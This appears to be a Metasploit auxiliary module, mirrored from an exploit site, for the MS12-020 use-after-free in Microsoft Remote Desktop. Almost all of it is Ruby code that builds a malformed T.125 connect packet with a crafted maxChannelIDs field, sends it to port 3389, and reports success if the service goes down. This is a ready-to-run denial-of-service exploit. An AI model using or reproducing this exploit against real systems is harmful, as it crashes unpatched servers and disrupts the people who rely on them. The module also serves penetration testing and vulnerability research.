Share
## https://sploitus.com/exploit?id=PACKETSTORM:180556
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Report  
include Msf::Exploit::Remote::Tcp  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'MS12-020 Microsoft Remote Desktop Use-After-Free DoS',  
'Description' => %q{  
This module exploits the MS12-020 RDP vulnerability originally discovered and  
reported by Luigi Auriemma. The flaw can be found in the way the T.125  
ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result  
an invalid pointer being used, therefore causing a denial-of-service condition.  
},  
'References' =>  
[  
[ 'CVE', '2012-0002' ],  
[ 'MSB', 'MS12-020' ],  
[ 'URL', 'http://www.privatepaste.com/ffe875e04a' ],  
[ 'URL', 'http://pastie.org/private/4egcqt9nucxnsiksudy5dw' ],  
[ 'URL', 'http://pastie.org/private/feg8du0e9kfagng4rrg' ],  
[ 'URL', 'http://stratsec.blogspot.com.au/2012/03/ms12-020-vulnerability-for-breakfast.html' ],  
[ 'EDB', '18606' ],  
[ 'URL', 'https://www.rapid7.com/blog/post/2012/03/21/metasploit-update/' ]  
],  
'Author' =>  
[  
'Luigi Auriemma',  
'Daniel Godas-Lopez', # Entirely based on Daniel's pastie  
'Alex Ionescu',  
'jduck',  
'#ms12-020' # Freenode IRC  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2012-03-16'  
))  
  
register_options(  
[  
Opt::RPORT(3389)  
])  
end  
  
def is_rdp_up  
begin  
connect  
disconnect  
return true  
rescue Rex::ConnectionRefused  
return false  
rescue Rex::ConnectionTimeout  
return false  
end  
end  
  
def run  
max_channel_ids = "\x02\x01\xff"  
  
pkt = ''+  
"\x03\x00\x00\x13" + # TPKT: version + length  
"\x0E\xE0\x00\x00" + # X.224 (connection request)  
"\x00\x00\x00\x01" +  
"\x00\x08\x00\x00" +  
"\x00\x00\x00" +  
"\x03\x00\x00\x6A" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224 (connect-initial)  
"\x7F\x65\x82\x00" + # T.125  
"\x5E" +  
"\x04\x01\x01" + # callingDomainSelector  
"\x04\x01\x01" + # calledDomainSelector  
"\x01\x01\xFF" + # upwardFlag  
"\x30\x19" + # targetParameters  
max_channel_ids + # maxChannelIds  
"\x02\x01\xFF" + # maxUserIds  
"\x02\x01\x00" + # maxTokenIds  
"\x02\x01\x01" + # numPriorities  
"\x02\x01\x00" + # minThroughput  
"\x02\x01\x01" + # maxHeight  
"\x02\x02\x00\x7C" + # maxMCSPDUsize  
"\x02\x01\x02" + # protocolVersion  
"\x30\x19" + # minimumParameters  
max_channel_ids + # maxChannelIds  
"\x02\x01\xFF" + # maxUserIds  
"\x02\x01\x00" + # maxTokenIds  
"\x02\x01\x01" + # numPriorities  
"\x02\x01\x00" + # minThroughput  
"\x02\x01\x01" + # maxHeight  
"\x02\x02\x00\x7C" + # maxMCSPDUsize  
"\x02\x01\x02" + # protocolVersion  
"\x30\x19" + # maximumParameters  
max_channel_ids + # maxChannelIds  
"\x02\x01\xFF" + # maxUserIds  
"\x02\x01\x00" + # maxTokenIds  
"\x02\x01\x01" + # numPriorities  
"\x02\x01\x00" + # minThroughput  
"\x02\x01\x01" + # maxHeight  
"\x02\x02\x00\x7C" + # maxMCSPDUsize  
"\x02\x01\x02" + # protocolVersion  
"\x04\x82\x00\x00" + # userData  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x08" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x28" + # T.125  
"\x03\x00\x00\x0C" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x38\x00\x06\x03" + # T.125  
"\xF0" +  
"\x03\x00\x00\x09" + # TPKT: version + length  
"\x02\xF0\x80" + # X.224  
"\x21\x80" # T.125  
  
unless is_rdp_up  
print_error("#{rhost}:#{rport} - RDP Service Unreachable")  
return  
end  
  
connect  
print_status("#{rhost}:#{rport} - Sending #{self.name}")  
sock.put(pkt)  
Rex.sleep(3)  
disconnect  
print_status("#{rhost}:#{rport} - #{pkt.length.to_s} bytes sent")  
  
print_status("#{rhost}:#{rport} - Checking RDP status...")  
  
if is_rdp_up  
print_error("#{rhost}:#{rport} - RDP Service Unreachable")  
return  
else  
print_good("#{rhost}:#{rport} seems down")  
report_vuln({  
:host => rhost,  
:port => rport,  
:name => self.name,  
:refs => self.references,  
:info => "Module #{self.fullname} successfully crashed the target system via RDP"  
})  
end  
  
end  
end